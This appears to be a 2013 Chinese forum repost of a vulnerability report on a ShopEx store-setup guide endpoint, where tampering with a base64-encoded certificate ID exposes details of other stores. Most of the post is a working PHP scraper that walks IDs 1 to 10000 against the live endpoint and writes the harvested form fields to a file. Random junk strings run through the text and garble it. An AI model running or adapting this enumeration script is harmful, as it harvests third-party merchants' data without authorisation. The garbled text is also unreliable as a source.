|
|
简要描述:0 s- F/ S3 ]* E( l, P
ShopEx某接口缺陷,可遍历所有网站% R' z% }8 p& f+ X/ f; O
详细说明:
, b& `7 n8 D* b问题出现在shopex 网店使用向导页面
# [" `/ w6 n) C& N% M* G5 K+ {- j& D8 V) ^% u! c
& C5 F# k9 `6 G- {; r# W8 ?
4 |+ n7 o9 }8 C; u) T9 H" r1 I0 R3 fhttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
2 _# B4 f k1 e9 t! W- J
" g! R2 ~. V `+ `& e' I
% i q5 z$ @3 A2 |8 g# r4 w4 `* z4 k" ?9 g5 }4 O
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
8 m9 ~% E) F% D
4 @( g( h" O9 ?, w+ P! z4 e$ K
+ d* R! P: K1 Q' k% O5 I& y$ c3 [8 B! R9 m& _" u
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
8 }9 M( K4 f- d i9 M; {& M% a+ A1 k3 i9 Y- o7 y; s) s
/ P% W7 N* o+ S9 v
( G$ x0 v6 D, Z' ?<?php0 b. { X: U( g! N0 r: L: V
8 [% p* l9 a! w% W9 g
for ($i=1; $i < 10000; $i++) { //遍历
% |3 O3 W& H; ^' Y
( ?7 I% p" A l% _3 x3 D8 h% d/ N5 q ShowshopExD($i);
+ d7 D4 D. v" D M8 ?. J/ L
g7 l: L6 \) g) d0 T8 l4 C: l }
# t3 I p/ C! b- e p9 }+ M- M3 t* }# r1 S9 C8 A5 P
function ShowshopExD($cid) {
2 g2 |& G! G/ y' @5 @
6 t. F7 Q4 C: T* B: g9 n; g. m- M, H& G6 Y $url='http://guide.ecos.shopex.cn/step2.php';
7 V' ~. K! @0 J" J) Y8 k, A9 J" C6 n( N' T
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
+ x `' T/ Q8 d0 o. A- p* _* r" y/ p
$url = $url.'?refer='.$refer;. W" D h, Z `; @
3 Q, h7 M( F0 A3 N7 K. _" L
$ch = curl_init($url);: n/ U$ X5 `7 N, K$ `# L
3 q) C& G5 ]% \1 s6 w curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;6 B( p3 v# x2 B, i, K8 E
- \% [. f7 l* u+ i3 v& n
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
" V: G: ]! f2 O9 ~# o- H- r
/ j8 w3 L t2 r0 x) E& X$ L $result = curl_exec($ch);2 P% A0 p0 ]% C, s* G
6 X% {# B0 |9 b# O: K $result = mb_convert_encoding($result, "gb2312", "UTF-8");7 k/ E! T4 o6 i
. {4 E" Z; j- e, J& ?; e: X5 ] if(strpos($result,$refer))3 k% ]0 i' r0 D
" R& J ` @' K9 c. y; z- p0 ]* W {
3 Z' D8 ^( f& D1 A$ P D
: }* v9 J9 t7 G, Z% u $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
6 m, [; v* l# h6 V
& T9 D' w+ Y2 C( I8 y p( p3 u preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
8 Y' e: }8 y( X! ?) Y4 A7 ^& p$ i) O) q# g9 E, l+ d
foreach ($value[1] as $key) {! T3 P, F" j2 E
! C) x7 F- C/ V+ W) r preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);* S5 ^: {5 m3 V. j, M* f
: \7 T/ f8 {' G4 Q' D6 }5 h
echo $res[1][0].':'.$res[3][0]."\r\n";9 v! P( Z; @' v2 n" _+ E
# ^0 D/ ?& w- p5 [$ K" Q5 ]0 P $col =$res[1][0].':'.$res[3][0]."\r\n";
J, i! T' q6 K' f8 d5 I+ z2 r
' z4 |$ g7 d* I7 E. U. B fwrite($fp, $col, strlen($col)); ! K; X( A5 j- \7 l; }' J5 d6 `0 V
/ \1 I, _, ~3 Q$ a- ]
}
4 [9 G1 Z! X+ c3 _- O3 I- p: A; h! _
) F% r9 R3 g) w! ^1 z0 y( ? echo '--------------------------------'."\r\n";. T0 a$ |) x! E- I& x9 u6 j4 Y
: ]! i1 ?3 b8 `) G7 X& h% O fclose($fp);
8 y: l- q) D; C! E4 ~* d5 S4 V( }* e1 O2 J3 [+ C5 M2 K8 T
}
8 K6 q7 h4 F* I. J% g
& F1 a1 X E1 N) W' w flush();
% {) H; Z5 K+ x5 s# h4 G) b/ N) @
# I4 N8 @7 ]# Z% @+ G; | curl_close($ch);
) F5 p& j4 ]8 v ]: a( N7 D
* j t) O/ J F }7 B, ]/ k' c9 c' C, E
w8 Q6 W( h2 ^& e- n
?>
# k1 }- r! h9 g0 V8 Y) E) A漏洞证明:! @6 |8 [1 Q7 r) O3 D' g# T& ]
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
+ @5 w' a& J( E/ M- U3 Y8 M6 @' }refer换成其他加密方式
+ \4 N8 M* W+ c# B- Y5 P: x |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对